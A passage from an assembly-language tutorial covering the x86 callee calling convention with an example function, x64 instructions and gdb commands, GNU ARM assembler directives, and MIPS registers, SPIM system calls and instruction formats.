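- 2. Next, allocate local variables by making space on the stack. Recall that the stack grows down, so to make space on top of the stack, the stack pointer should be decremented. The amount by which it is decremented depends on the number and size of the local variables needed. For example, if 3 local integers (4 bytes each) are required, the stack pointer needs to be decremented by 12 to make space for them (i.e. sub $12, %esp). As with parameters, local variables are located at known offsets from the base pointer.
- 3. Next, save the values of the callee-saved registers that will be used by the function. To save registers, push them onto the stack. The callee-saved registers are EBX, EDI, and ESI (ESP and EBP are also preserved by the calling convention, but need not be pushed in this step).
After these 3 actions are performed, the body of the subroutine may proceed. When the subroutine returns, it must follow these steps:
- Leave the return value in EAX.
- Restore the old values of any callee-saved registers (EDI and ESI) that were modified. The register contents are restored by popping them from the stack. They should be popped in the reverse of the order in which they were pushed.
- Deallocate local variables. The obvious way to do this is to add the appropriate value to the stack pointer (since the space was allocated by subtracting the needed amount from the stack pointer). In practice, a less error-prone way to deallocate the variables is to move the value in the base pointer into the stack pointer: mov %ebp, %esp. This works because the base pointer always contains the value that the stack pointer contained immediately before the local variables were allocated.
- Immediately before returning, restore the caller's base pointer value by popping EBP off the stack. Recall that the first thing we did on entry to the subroutine was to push the base pointer to save its old value.
- Finally, return to the caller by executing a ret instruction. This instruction finds and removes the appropriate return address from the stack (the one saved by the call instruction).
Note that the callee's rules fall cleanly into two halves that are basically mirror images of one another. The first half of the rules applies at the beginning of the function and is commonly said to define the prologue of the function. The latter half applies at the end of the function and is thus commonly said to define the epilogue of the function.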
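- Example
Here is an example function definition that follows the callee rules:
;start the code section
.text
;define myFunc as a global (exported) function
.globl myFunc
.type myFunc, @function
myFunc :
;subroutine prologue
push %ebp ;save the old base pointer value
mov %esp, %ebp ;set the new base pointer value
sub $4, %esp ;make room for one 4-byte local variable
push %edi
push %esi ;this function modifies EDI and ESI, so save them first
;no need to save EBX, EBP, or ESP
;subroutine body
mov 8(%ebp), %eax ;move the value of parameter 1 into EAX
mov 12(%ebp), %esi ;move the value of parameter 2 into ESI
mov 16(%ebp), %edi ;move the value of parameter 3 into EDI
mov %edi, -4(%ebp) ;move EDI into the local variable
add %esi, -4(%ebp) ;add ESI into the local variable
add -4(%ebp), %eax ;add the contents of the local variable into EAX (the final result)
;subroutine epilogue
pop %esi ;restore register values
pop %edi
mov %ebp, %esp ;deallocate the local variable
pop %ebp ;restore the caller's base pointer value
ret
The subroutine prologue performs the standard actions of saving a snapshot of the stack pointer in EBP (the base pointer), allocating local variables by decrementing the stack pointer, and saving register values on the stack.
In the body of the subroutine we can see the use of the base pointer. Both parameters and local variables are located at constant offsets from the base pointer for the duration of the subroutine's execution. In particular, since parameters were placed onto the stack before the subroutine was called, they are always located below the base pointer (i.e. at higher addresses) on the stack. The first parameter to the subroutine can always be found at memory location (EBP+8), the second at (EBP+12), and the third at (EBP+16). Similarly, since local variables are allocated after the base pointer is set, they always reside above the base pointer (i.e. at lower addresses) on the stack. In particular, the first local variable is always located at (EBP-4), the second at (EBP-8), and so on. This conventional use of the base pointer allows us to quickly identify the use of local variables and parameters within a function body.
The function epilogue is basically a mirror image of the function prologue. The caller's register values are restored from the stack, the local variables are deallocated by resetting the stack pointer, the caller's base pointer value is restored, and the ret instruction is used to return to the appropriate code location in the caller.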
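3.4 x64 Assembly Basics
3.4.1 Introduction
x86-64 (also known as x64 or AMD64) is the 64-bit version of the x86/IA32 instruction set. What follows is our overview of the features relevant to CS107.
3.4.2 Registers
The commonly used registers are the 16 general-purpose registers plus 2 special-purpose ones. Each register is 64 bits wide; its low 32, 16, and 8 bits can be accessed as a 32-, 16-, or 8-bit register under a separate name. Some registers have a dedicated role: %rsp is the stack pointer and %rax holds a function's return value. The remaining registers are general-purpose, but by convention each is designated either caller-owned or callee-owned. If function binky calls winky, binky is the caller and winky is the callee. For example, the registers used for the first 6 arguments and for the return value are all callee-owned: the callee may use them freely and overwrite their contents without any precaution. If %rax holds a value the caller wants to keep, the caller must copy it to a "safe" location before making the call. Callee-owned registers are ideal for scratch use. Conversely, if the callee intends to use a caller-owned register, it must first save the register's value and restore it before returning. Caller-owned registers hold the caller's local state, so they must be preserved across further function calls.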
3.4.3 Addressing modes
In keeping with its CISC nature, x86-64 supports a variety of addressing modes. An addressing mode is an expression that computes a memory address to be read or written. These expressions serve as the source or destination of mov and of other instructions that access memory. The code below shows how to write the immediate value 1 to various memory locations using each available addressing mode:
movl $1, 0x604892 # direct: the address is a constant
movl $1, (%rax) # indirect: the address is in register %rax
movl $1, -24(%rbp) # indirect with displacement
# (address = base %rbp + displacement -24)
movl $1, 8(%rsp, %rdi, 4) # indirect with displacement and scaled index
# (address = base %rsp + displacement 8 + index %rdi * scale 4)
movl $1, (%rax, %rcx, 8) # special case of scaled index: displacement assumed to be 0
movl $1, 0x8(, %rdx, 4) # special case of scaled index: base assumed to be 0
movl $1, 0x4(%rax, %rcx) # special case of scaled index: scale assumed to be 1
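3.4.4 Common instructions
First, a recap of instruction suffixes: many instructions take a suffix (b, w, l, or q) that gives the width of the operands (1, 2, 4, or 8 bytes respectively). The suffix may be omitted when the width can be determined from the operands. For example, if the destination register is %eax the operand must be 4 bytes wide, %ax means 2 bytes, and %al means 1 byte. A few instructions, such as movs and movz, take two suffixes: the first gives the source width and the second the destination width. For example, movzbl moves a 1-byte source value into a 4-byte destination.
When the destination is a sub-register, only the bytes of that sub-register are written, with one exception: a 32-bit instruction sets the upper 32 bits of the destination register to 0.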
mov and lea
By far the most frequently encountered instruction is mov, which has many variants. mov behaves as it does on 32-bit x86, and lea was also covered in the previous section, so neither is repeated here.
A few interesting examples:
mov 8(%rsp), %eax # %eax = value read from address %rsp + 8
lea 0x20(%rsp), %rdi # %rdi = %rsp + 0x20 (no memory access)
lea (%rdi,%rdx,1), %rax # %rax = %rdi + %rdx
When a smaller value is copied into a larger destination, the movs and movz variants specify how the remaining bytes are filled: with zeros (zero-extend) or with copies of the sign bit (sign-extend).
movsbl %al, %edx # copy 1-byte %al, sign-extended, into 4-byte %edx
movzbl %al, %edx # copy 1-byte %al, zero-extended, into 4-byte %edx
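One special case to note: by default, a mov that writes a 32-bit value into a register also zeroes the upper 32 bits of that register, i.e. it implicitly zero-extends to width q. This explains instructions such as mov %ebx, %ebx, which look odd but in fact zero-extend from 32 to 64 bits. Because this is the default behavior, there is no explicit movzlq instruction. There is, however, a movslq instruction that sign-extends from 32 to 64 bits.
cltq is a specialized move that operates on %rax. It takes no operands and sign-extends %eax into %rax: the source width is l and the destination width is q.
cltq # operates on %rax: sign-extends a 4-byte src to an 8-byte dst; equivalent to movslq %eax,%rax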
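Arithmetic and bitwise operations
Binary operations generally take two operands, where the second operand is both a source and the destination: the result is stored in the second operand. The first operand may be an immediate constant, a register, or a memory location; the second must be a register or memory. At most one of the two may be a memory location. Unary operations take a single operand that is both source and destination; it may be a register or memory. Many arithmetic instructions serve both signed and unsigned types, i.e. signed and unsigned addition use the same instruction. When needed, the condition codes set by the operation can be used to detect the different kinds of overflow.
add src, dst # dst = dst + src
sub src, dst # dst = dst - src
imul src, dst # dst = dst * src
neg dst # dst = -dst (arithmetic negation)
and src, dst # dst = dst & src
or src, dst # dst = dst | src
xor src, dst # dst = dst ^ src
not dst # dst = ~dst (bitwise complement)
shl count, dst # dst <<= count (left shift by count); sal is a synonym
sar count, dst # dst >>= count (arithmetic right shift by count)
shr count, dst # dst >>= count (logical right shift by count)
# some instructions have special-case variants with different operands
imul src # one-operand imul takes %rax as the other operand and computes a 128-bit result: high 64 bits in %rdx, low 64 bits in %rax
shl dst # dst <<= 1 (with no count operand the shift is by 1 bit; the same holds for sar, shr, and sal)
These instructions were all covered in the previous section and are only recapped here.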
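Control flow instructions
A special %eflags register holds a set of boolean flags called condition codes. Most arithmetic operations update them, and a conditional jump reads them to decide whether to take the branch. The condition codes include ZF (zero flag), SF (sign flag), OF (overflow flag, signed), and CF (carry flag, unsigned). For example, ZF is set if the result is 0, and OF is set if the operation overflows (into the sign bit).
The usual pattern is a cmp or test instruction that sets the flags, followed by a jump variant that reads the flags to decide whether to take the branch or continue with the next instruction. The operands of cmp or test may be immediates, registers, or memory locations (at most one memory operand). There are 32 variants of conditional jump, several of which are synonyms. Some branch instructions follow.
cmpl op2, op1 # computes op1 - op2, discards the result, and sets the condition codes
test op2, op1 # computes op1 & op2, discards the result, and sets the condition codes
jmp target # unconditional jump
je target # jump if equal; synonym jz, jump if zero (ZF = 1)
jne target # jump if not equal; synonym jnz, jump if not zero (ZF = 0)
jl target # jump if less; synonym jnge, jump if not greater or equal (SF != OF)
jle target # jump if less or equal; synonym jng, jump if not greater (ZF = 1 or SF != OF)
jg target # jump if greater; synonym jnle, jump if not less or equal (ZF = 0 and SF = OF)
jge target # jump if greater or equal; synonym jnl, jump if not less (SF = OF)
ja target # jump if above (unsigned >); synonym jnbe, jump if not below or equal (CF = 0 and ZF = 0)
jb target # jump if below (unsigned <); synonym jnae, jump if not above or equal (CF = 1)
js target # jump if SF = 1
jns target # jump if SF = 0
Most of this was also covered in the previous section; it is repeated here for reinforcement.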
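setx and cmovx
Two more instruction families read and react to the current condition codes. setx sets its destination to 0 or 1 according to the state of condition x. cmovx performs a mov only if condition x holds. Here x is a placeholder for any condition suffix, for example e, ne, s, or ns, with the meanings given above.
sete dst # set dst to 0 or 1 according to the zero/equal condition
setge dst # set dst to 0 or 1 according to the greater-or-equal condition
cmovns src, dst # perform the mov only if the ns condition holds
cmovle src, dst # perform the mov only if the le condition holds
For setx, the destination is a single byte, typically a byte register such as %al (the low byte of %rax). For cmovx, the destination must be a register.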
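Function calls and the stack
The %rsp register serves as the stack pointer; push and pop add and remove values on the stack. push takes one operand: an immediate constant, a register, or a memory location. It first decrements %rsp and then copies the operand to the topmost stack slot. pop also takes one operand, the destination register. It first copies the topmost stack value into the destination register and then increments %rsp. It is also possible to adjust %rsp directly, to add or remove an entire array or set of variables with a single instruction. Note that the stack grows downward (toward lower addresses).
push %rbx # push %rbx onto the stack
pushq $0x3 # push the immediate 3 onto the stack
sub $0x10, %rsp # adjust the stack pointer to reserve 16 bytes
pop %rax # pop the topmost stack value into %rax
add $0x10, %rsp # adjust the stack pointer to discard the topmost 16 bytes
Functions transfer control to one another through call and return. callq takes one operand, the address of the function being called. It pushes the return address, which is the current value of %rip, i.e. the address of the instruction following the call, and then jumps to the address of the called function. retq pops that address off the stack back into %rip, so execution resumes at the saved return address.
To set up a call, the caller places the first six arguments in registers %rdi, %rsi, %rdx, %rcx, %r8, and %r9 (any further arguments are pushed on the stack) and then executes the call instruction.
mov $0x3, %rdi # first argument in %rdi
mov $0x7, %rsi # second argument in %rsi
callq binky # transfer control to binky
When the callee finishes, it writes the return value (if any) to %rax, cleans up the stack, and uses retq to hand control back to the caller.
mov $0x0, %eax # write the return value to %rax
add $0x10, %rsp # clean up the stack
retq # return control to the caller
The targets of these branch and call instructions are usually fixed when the program is built. In some cases, however, the target is not known until run time, for example a switch statement compiled to a jump table, or a call through a function pointer. For these, the target address is first computed and stored in a register, and then the indirect variant jmp *%rax or callq *%rax reads the target address from that register.
For targets that are fixed, the simpler approach is the labels covered in the previous section.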
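3.4.5 Assembly and gdb
The debugger has many features for tracing and debugging code at the assembly level. You can print the value in a register by prefixing its name with $, or dump all registers with the info reg command:
(gdb) p $rsp
(gdb) info reg
The disassemble command prints the disassembly of a function given its name. The x command supports the i format, which interprets the contents of memory as encoded instructions and decodes them.
(gdb) disassemble main //disassemble and print all instructions of main
(gdb) x/8i main //disassemble and print the first 8 instructions
You can set a breakpoint at a specific assembly instruction, either by its direct address or by an offset within a function.
(gdb) b *0x08048375
(gdb) b *main+7 //break at main + 7 bytes
You can advance by instruction (rather than by source line) with the stepi and nexti commands.
(gdb) stepi
(gdb) nexti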
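3.5 ARM Assembly Basics
3.5.1 Introduction
This chapter is a quick guide to ARM assembly under the GNU assembler. All code examples use the following layout:
[<label>:] {<instruction or directive>} @ comment
The GNU assembler does not require instructions to be indented. A label is recognized by its trailing colon, regardless of where it appears on the line. A simple program illustrates this:
.section .text, "x"
.global add @ give the symbol external linkage
add:
ADD r0, r0, r1 @ add the input arguments
MOV pc, lr @ return from the subroutine
@ end of program
It defines a function "add" that takes two input arguments and returns their sum. The examples that follow use the same layout.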
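3.5.2 GNU assembler directives for ARM
The GNU assembler directives for ARM are as follows:
GNU assembler directive | Description |
---|---|
.ascii "<string>" | Insert the string into the program as data |
.asciz "<string>" | Like .ascii, but follows the string with a zero byte |
.balign <power_of_2> {,<fill_value>{,<max_padding>} } | Align the address to <power_of_2> bytes. The assembler aligns by adding bytes of value <fill_value> or a suitable default. No alignment occurs if more than <max_padding> fill bytes would be needed (similar to ALIGN in armasm) |
.byte <byte1> {,<byte2> } … | Insert a list of byte values into the program as data |
.code <number_of_bits> | Set the instruction width in bits. Use 16 for Thumb and 32 for ARM code (similar to CODE16 and CODE32 in armasm) |
.else | Used with .if and .endif (similar to ELSE in armasm) |
.end | Mark the end of the program file (usually omitted) |
.endif | End a conditional block; see .if, .ifdef, .ifndef (similar to ENDIF in armasm) |
.endm | End a macro definition; see .macro (similar to MEND in armasm) |
.endr | End a repeat loop; see .rept and .irp (similar to WEND in armasm) |
.equ <symbol name>, <value> | Set the value of a symbol (similar to EQU in armasm) |
.err | Halt assembly with an error |
.exitm | Exit a macro partway through; see .macro (similar to MEXIT in armasm) |
.global <symbol> | Give the symbol external linkage (similar to EXPORT in armasm) |
.hword <short1> {,<short2> }... | Insert a list of 16-bit values into the program as data (similar to DCW in armasm) |
.if <logical_expression> | Make a block of code conditional. End the block with .endif (similar to IF in armasm). See also .else |
.ifdef <symbol> | Include a block of code if <symbol> is defined. End the block with .endif |
.ifndef <symbol> | Include a block of code if <symbol> is not defined. End the block with .endif |
.include "<filename>" | Include the named source file (similar to INCLUDE in armasm or #include in C) |
.irp <param> {,<val 1>} {,<val_2>} ... | Repeat a block of code once for each value in the value list. Mark the end of the block with .endr. Inside the repeated block, use \<param> to substitute the current value from the list |
.macro <name> {<arg_1>} {,< arg_2>} ... {,<arg_N>} | Define an assembler macro called <name> with N parameters. The definition must end with .endm. To leave the macro early, use .exitm. These directives are similar to MACRO, MEND, and MEXIT in armasm. Macro parameters must be preceded by \ when used |
.rept <number_of_times> | Repeat a block of code the given number of times. End with .endr |
<register_name> .req <register_name> | Name a register. Similar to the RN directive in armasm, except that the right-hand side must be a name rather than a number (for example, acc .req r0) |
.section <section_name> {,"<flags> "} | Start a new code or data section. GNU provides these sections: .text (code), .data (initialized data), and .bss (uninitialized data). They have default flags and the linker understands the default names (similar to the AREA directive in armasm). Flags allowed for ELF files: a = allocatable section, w = writable section, x = executable section |
.set <variable_name>, <variable_value> | Set the value of a variable (similar to SETA in armasm) |
.space <number_of_bytes> {,<fill_byte> } | Reserve the given number of bytes, filled with zero or with <fill_byte> if specified (similar to SPACE in armasm) |
.word <word1> {,<word2>}... | Insert a list of 32-bit word values into the program as data (similar to DCD in armasm) |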
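3.5.3 Register names
General-purpose registers:
%r0 - %r15
Floating-point registers:
%f0 - %f7
Temporary registers:
%r0 - %r3, %r12
Saved registers:
%r4 - %r10
Stack pointer register:
%sp
Frame pointer register:
%fp
Link register:
%lr
Program counter:
%pc
Status register:
$psw
Status flag registers:
xPSR
xPSR_all
xPSR_f
xPSR_x
xPSR_ctl
xPSR_fs
xPSR_fx
xPSR_fc
xPSR_cs
xPSR_cf
xPSR_cx
3.5.4 Assembler special characters/syntax
Inline comment character: '@'
Line comment character: '#'
Statement separator: ';'
Immediate operand prefix: '#' or '$'
3.5.5 ARM procedure call standard
Argument registers: %a1 - %a4 (aliases of %r0 - %r3)
Variable registers (callee-saved): %v1 - %v6 (aliases of %r4 - %r9); the return value is passed back in %r0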
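3.5.6 Addressing modes
addr
Absolute addressing
%rn
Register direct addressing
[%rn]
Register indirect or indexed addressing
[%rn,#n]
Register-based addressing with offset
Here "rn" stands for any register except the control registers.
3.5.7 Machine-dependent directives
Directive | Description |
---|---|
.arm | Assemble in ARM mode |
.thumb | Assemble in Thumb mode |
.code16 | Assemble in Thumb mode |
.code32 | Assemble in ARM mode |
.force_thumb | Force Thumb mode (even if not supported) |
.thumb_func | Mark the entry point as Thumb code (forces a bx entry) |
.ltorg | Start a new literal pool |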
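3.6 MIPS Assembly Basics
Data types and constants
- Data types:
- All instructions are 32 bits wide
- Byte (8 bits), halfword (2 bytes), word (4 bytes)
- A character takes 1 byte of storage
- An integer takes 1 word (4 bytes) of storage
- Constants:
- Numbers are entered as is, e.g. 4
- Characters are enclosed in single quotes, e.g. 'b'
- Strings are enclosed in double quotes, e.g. "A string"
Registers
- 32 general-purpose registers
- Register names are preceded by $
Two forms are used to name a register:
- By register number, e.g. $0 through $31
- By alias, e.g. $t1, $sp
- The special registers Lo and Hi store the results of multiplication and division
- They cannot be addressed directly; their contents are accessed with the special instructions mfhi ("move from Hi") and mflo ("move from Lo")
- The stack grows from high addresses to low addresses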
Register | Alias | Use |
---|---|---|
$0 | $zero | Constant value 0 |
$1 | $at | Reserved for the assembler |
$2-$3 | $v0-$v1 | Function return values (values for results and expression evaluation) |
$4-$7 | $a0-$a3 | Function call arguments |
$8-$15 | $t0-$t7 | Temporaries (free to use) |
$16-$23 | $s0-$s7 | Saved (must be saved and restored if used) |
$24-$25 | $t8-$t9 | Temporaries (free to use) |
$26-$27 | $k0-$k1 | Reserved for interrupt/trap handlers |
$28 | $gp | Global pointer |
$29 | $sp | Stack pointer |
$30 | $fp | Frame pointer |
$31 | $ra | Return address |
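A closer look at these registers:
- zero: normally used as a source register; reading it always returns 0. It can also be named as a destination, but the write has no effect. Why dedicate a register to a single number? The answer is efficiency: MIPS arithmetic operates on registers, and 0 is the most frequently needed constant, so it gets a register of its own.
- at: reserved for the assembler. It is used when loading constants wider than 16 bits, which the assembler (or compiler) must split apart and reassemble in a register. Systems programmers may also use this register explicitly; an assembler directive can forbid the assembler from using at after that point.
- v0, v1: hold function return values; most of the time v0 alone suffices. If the return value is larger than 8 bytes, stack space is needed: the caller allocates an anonymous structure on the stack and passes a pointer to it, and on return v0 points to that structure. The compiler handles all of this automatically.
- a0-a3: pass arguments to a called function. Consider this example:
ret = strncmp("bear","bearer",4)
The arguments total fewer than 16 bytes and therefore fit in registers. Inside strncmp, a0 holds the address of the string "bear" in read-only data, a1 holds the address of "bearer", and a2 is 4.
- t0-t9 (temporary registers) and s0-s8 (saved registers): these two groups are best described together. They are the registers seen most often in MIPS assembly, and both are used for holding data during computation, shifts, comparisons, loads, stores, and so on. The difference is that a subroutine may use t0-t9 without saving them, which makes them well suited to the "temporary" values that arise while evaluating an expression. Any use of such a value must be finished before jumping to a subroutine, because the subroutine may well use the same registers with no protection at all. If a subroutine calls no other function, using t0-t9 as much as possible is recommended, since it avoids the save on entry and the restore on exit. By contrast, a subroutine that uses s0-s8 must save them on the stack and restore them before it returns, so that from the caller's point of view their values never change.
- k0, k1: reserved for exception handling. What is special about exception handling? When a MIPS CPU is running a task and an external interrupt or exception occurs, the CPU immediately jumps to an exception handler at a fixed address and records, in the EPC (Exception Program Counter) register, the address at which the task should resume. By convention, the handler begins by saving the context, i.e. the MIPS registers, to the interrupt stack, and restores those registers before returning. This raises a question: where is the EPC value kept? The handler must end with a jr x, where x is a MIPS register. If x were one of the registers mentioned earlier, such as t0 or s0, then when the PC jumped back to the task that register would no longer hold its pre-exception value. So a register must be set aside for this purpose: the handler copies EPC into k0 and can then return with a single jr k0. k1 is the other register dedicated to exceptions; it can be used to record the interrupt nesting depth. While the CPU executes task code k1 can be set to 0; each entry into interrupt context increments it and each exit decrements it. This depth is often useful when debugging, and an application that needs to know whether it is in task or interrupt context can test whether k1 is 0.
- sp: points to the top of the stack currently in use. It points to the next writable location on the stack; fetching one byte from the top of the stack reads the contents of address sp-1. In a system with an RTOS, every task has its own stack space and its own live copy of sp, as do interrupts; these are saved and restored during context switches.
- gp: an auxiliary register whose meaning is somewhat loose. MIPS officially suggests two uses. One is to point to the global offset table used for out-of-module data references by position-independent code in Linux applications. The other, in small embedded systems running an RTOS, is to point to a region of frequently accessed global data: since every MIPS instruction is 32 bits long and carries a signed 16-bit offset, a single instruction with gp as the base can reach addresses within plus or minus 15 bits, which improves efficiency. How does the compiler know the initial value of gp? Define a _gp symbol in the link script and the linker will treat it as the value of gp; at power-on, load the value of _gp into the gp register. These are only suggestions from the MIPS designers, not requirements; the author has also seen gp used as a staging location for sp during interrupt and task switches, which works too.
- fp: interpreted differently by different compilers. The GNU MIPS C compiler uses it as a frame pointer that points to the first word of the procedure frame (one function's frame) on the stack. The function can address local variables in its frame as offsets from fp, and sp is free to move, because fp is used to restore it before the function exits. The SGI C compiler instead treats this register as s8, giving the compiler one more saved register.
- ra: holds the address to return to after a called function finishes. A function call in assembly has the form:
jal function_X
jal (jump-and-link) stores the address of the currently executing instruction + 4 in ra (+ 8 on hardware with a branch delay slot) and then jumps to the address of function_X. Correspondingly, the most common instruction for returning from a function is jr ra. ra is also very useful for debugging: at any moment its value can be inspected to trace where the CPU has been.
Finally, when writing pure assembly, all of these registers except zero can be used as ordinary registers for holding data (which is why they are called "general-purpose registers", unlike the dedicated registers of coprocessors or peripherals, whose functions are fixed at the factory). Why, then, so many rules? The MIPS developers designed an ABI (Application Binary Interface) so that their processors could run high-level languages such as C and Java and so that assembly and high-level code could be mixed safely. It gives compiler writers a common standard to follow, and lets systems programmers who read or modify assembly understand the code more readily.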
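Program structure
- A program is essentially a plain text file containing data declarations and program code (the file name should end in .s or .asm)
- The data declaration section is followed by the program code section
Data declarations
- Placed in the section introduced by the assembler directive .data
- Declaring a variable allocates space for it in memory
Code
- Placed in the text section introduced by the assembler directive .text
- Contains the program code (instructions)
- Execution starts at the label main: (as in C)
- The end of the program is signalled with the exit system call (see the system calls below)
Comments
- # starts a single-line comment; everything after # on the line is treated as a comment
- A template for a MIPS assembly language program:
# Comment giving the name of the program and a description of its function
# Template.s
# Bare-bones outline of a MIPS assembly language program
.data # variable declarations follow this line
# ...
.text # instructions follow this line
main: # indicates the start of the code (first instruction to execute)
# ...
# End of program; leave a blank line afterwards to keep SPIM happy.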
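Variable declarations
Format of a declaration:
name: storage_type value(s)
This creates storage for a variable of the specified type with the given name and value(s).
value(s) usually gives the initial value(s); for .space it gives the number of bytes to allocate.
Note: a label is always followed by a colon (:)
- Example
var1: .word 3 # create a single integer variable with initial value 3
array1: .byte 'a','b' # create a 2-element character array initialized to a and b
array2: .space 40 # allocate 40 consecutive bytes of uninitialized space, usable as a
# 40-element character array or a 10-element integer array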
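Load/Store instructions
- RAM may be accessed only with load and store instructions
- All other instructions use register operands
load:
lw register_destination, RAM_source
# copy the word (4 bytes) at the source RAM address into the destination register (the 'w' in lw stands for word)
lb register_destination, RAM_source
# copy the byte at the source RAM address into the low-order byte of the destination register and sign-extend it into the higher-order bytes (lb stands for load byte)
store:
sw register_source, RAM_destination
# store the word in the source register to the destination RAM address
sb register_source, RAM_destination
# store the low-order byte of the source register to the destination RAM address
load immediate:
li register_destination, value
# load an immediate value into the destination register (li stands for load immediate)
- Example
.data
var1: .word 23 # reserve storage for var1 with initial value 23
.text
__start:
lw $t0, var1 # load the contents of the memory location into $t0: $t0 = var1
li $t1, 5 # $t1 = 5 ("load immediate")
sw $t1, var1 # store the contents of $t1 to memory: var1 = $t1
done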
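Indirect and based addressing
- Used only with load and store instructions
Loading an address:
la $t0, var1
- Copy the RAM address of var1 (presumably a label defined in the program) into register $t0
Indirect addressing (the address is the contents of a register, much like a pointer):
lw $t2, ($t0)
- Load the word at the RAM address contained in $t0 into $t2
sw $t2, ($t0)
- Store the word in register $t2 to RAM at the address contained in $t0
Based (offset) addressing:
lw $t2, 4($t0)
- Load the word at RAM address ($t0 + 4) into register $t2
- "4" is the offset from the address in register $t0
sw $t2, -12($t0)
- Store the word in register $t2 to RAM at address ($t0 - 12)
- Negative offsets are fine
Note: based addressing is especially useful for:
- Arrays: elements are accessed as offsets from the base address
- Stacks: elements are easily accessed as offsets from the stack pointer or frame pointer
- Example
.data
array1: .space 12 # declare 12 bytes of storage for array1, enough for 3 integers
.text
__start: la $t0, array1 # $t0 = base address of the array
li $t1, 5 # $t1 = 5 ("load immediate")
sw $t1, ($t0) # first array element set to 5 (indirect addressing): array1[0] = $t1 = 5
li $t1, 13 # $t1 = 13
sw $t1, 4($t0) # second array element set to 13: array1[1] = $t1 = 13
# elements are one element size (4 bytes) apart, so array1 + 4 is the address of array1[1]
li $t1, -7 # $t1 = -7
sw $t1, 8($t0) # third array element set to -7
# array1 + 8 = (address(array1[0]) + 4) + 4 = address(array1[1]) + 4 = address(array1[2])
done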
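Arithmetic instructions
- Use up to 3 operands
- All operands are registers; memory addresses are not allowed
- Operand size is one word (4 bytes): 32 bits = 4 * 8 bits = 4 bytes = 1 word
add $t0,$t1,$t2 # $t0 = $t1 + $t2; add as signed (two's complement) integers
sub $t2,$t3,$t4 # $t2 = $t3 - $t4
addi $t2,$t3, 5 # $t2 = $t3 + 5; "add immediate"
addu $t1,$t6,$t7 # $t1 = $t6 + $t7; add as unsigned integers
subu $t1,$t6,$t7 # $t1 = $t6 - $t7; subtract as unsigned integers
mult $t3,$t4 # multiply $t3 by $t4; the 64-bit result goes to (Hi, Lo): Hi = upper 32 bits, Lo = lower 32 bits
div $t5,$t6 # Lo = $t5 / $t6 (integer quotient)
# Hi = $t5 mod $t6 (remainder)
# the quotient is placed in Lo, the remainder in Hi
mfhi $t0 # move the special register Hi to $t0: $t0 = Hi
mflo $t1 # move the special register Lo to $t1: $t1 = Lo
# Hi and Lo cannot be read directly; mfhi and mflo copy them to a register
move $t2,$t3 # $t2 = $t3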
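Control flow
Branches (if-else)
- The comparison for a conditional branch is built into the instruction
b target # unconditional branch to the program label target
beq $t0, $t1, target # branch to target if $t0 == $t1
blt $t0, $t1, target # branch to target if $t0 < $t1
ble $t0, $t1, target # branch to target if $t0 <= $t1
bgt $t0, $t1, target # branch to target if $t0 > $t1
bge $t0, $t1, target # branch to target if $t0 >= $t1
bne $t0, $t1, target # branch to target if $t0 != $t1
Jumps (while, for, goto)
j target # unconditional jump to the program label target
jr $t3 # jump to the address contained in $t3 ("jump register")
Subroutine calls
Subroutine call: the "jump and link" instruction
jal sub_label # "jump and link"
- Save the return address (the address of the instruction after the jal) in $ra
- Jump to the program statement at sub_label
Subroutine return: the "jump register" instruction
jr $ra # "jump register"
- Jump to the return address in $ra (stored there by the jal instruction)
Note: the return address is stored in register $ra. If a subroutine calls other subroutines, or is recursive, the return address should be copied from $ra onto the stack to preserve it, because jal always places the return address in this register and will overwrite the previous value.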
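System calls and I/O (for the SPIM simulator)
- System calls are used to read or print values or strings from the input/output window, and to signal the end of the program
- Use the syscall instruction
- First supply the appropriate values in registers $v0 and $a0-$a1
- The result value (if any) is returned in register $v0
The following table lists the available system call services.
Service | Code in $v0 | Arguments | Results |
---|---|---|---|
print_int (print an integer) | $v0 = 1 | $a0 = integer to print | |
print_float (print a float) | $v0 = 2 | $f12 = float to print | |
print_double (print a double) | $v0 = 3 | $f12 = double to print | |
print_string (print a string) | $v0 = 4 | $a0 = address of the string to print | |
read_int (read an integer) | $v0 = 5 | | integer read, returned in $v0 |
read_float (read a float) | $v0 = 6 | | float read, returned in $f0 |
read_double (read a double) | $v0 = 7 | | double read, returned in $f0 |
read_string (read a string) | $v0 = 8 | $a0 = address of the input buffer; $a1 = buffer length | |
sbrk (like the C sbrk() function) | $v0 = 9 | $a0 = amount of memory to allocate, in bytes | address of the allocated block in $v0 |
exit | $v0 = 10 | | |
- The print_string service expects the address of a null-terminated string. The directive .asciiz creates a null-terminated string.
- The read_int, read_float, and read_double services read an entire line of input, up to and including the newline character \n.
- The read_string service has the same semantics as the UNIX library routine fgets.
- It reads up to n-1 characters into a buffer and terminates the string with a null character.
- If the current line has fewer than n-1 characters, it reads up to and including the newline and again terminates the string with a null character.
- In other words, overlong input is truncated, and the result always ends with a terminator.
- The sbrk service returns the address of a block of memory containing n additional bytes; it is used for dynamic memory allocation.
- The exit service stops the program from running.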
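- Example: print the integer stored in $t2
li $v0, 1 # load the service code for print_int (1) into $v0
move $a0, $t2 # move the integer to be printed into $a0
syscall # ask the operating system to perform the operation
- Example: read an integer and store it in memory in the variable int_value
li $v0, 5 # load the service code for read_int (5) into $v0
syscall # ask the operating system to perform the read; afterwards $v0 holds the number read
sw $v0, int_value # store the value read into memory ("store word")
- Example: print a string (this one is a complete program; the fragments above can replace the code under main: and run the same way)
.data
string1: .asciiz "Print this.\n" # declaration of the string variable
# the .asciiz directive null-terminates the string
.text
main: li $v0, 4 # load the service code for print_string (4) into $v0
la $a0, string1 # load the address of the string to print into $a0
syscall # ask the operating system to print
To signal the end of the program, use the exit system call; the last lines of the program should therefore be:
li $v0, 10 # service code 10 is exit
syscall # ask the operating system to end the program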
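Supplement: MIPS instruction formats
- R format
6 | 5 | 5 | 5 | 5 | 6 |
---|---|---|---|---|---|
op | rs | rt | rd | shamt | funct |
Used for: register-register ALU operations; reading and writing special registers
- I format
6 | 5 | 5 | 16 |
---|---|---|---|
op | rs | rt | immediate |
Used for: loading/storing bytes, halfwords, words, and doublewords; conditional branches; jump and jump-and-link through a register
- J format
6 | 26 |
---|---|
op | jump address |
Used for: jump, jump and link; trap and return from exception
Field meanings:
- op: the basic operation of the instruction, called the opcode.
- rs: the first source operand register.
- rt: the second source operand register.
- rd: the destination register that receives the result.
- shamt: the shift amount.
- funct: the function code, which selects a specific variant of the operation given by op.
Example: add $t0,$s0,$s1 means $t0 = $s0 + $s1, i.e. the contents of register 16 (s0) and register 17 (s1) are added and the result is placed in register 8 (t0). The fields of the instruction in decimal are:
0 | 16 | 17 | 8 | 0 | 32 |
---|---|---|---|---|---|
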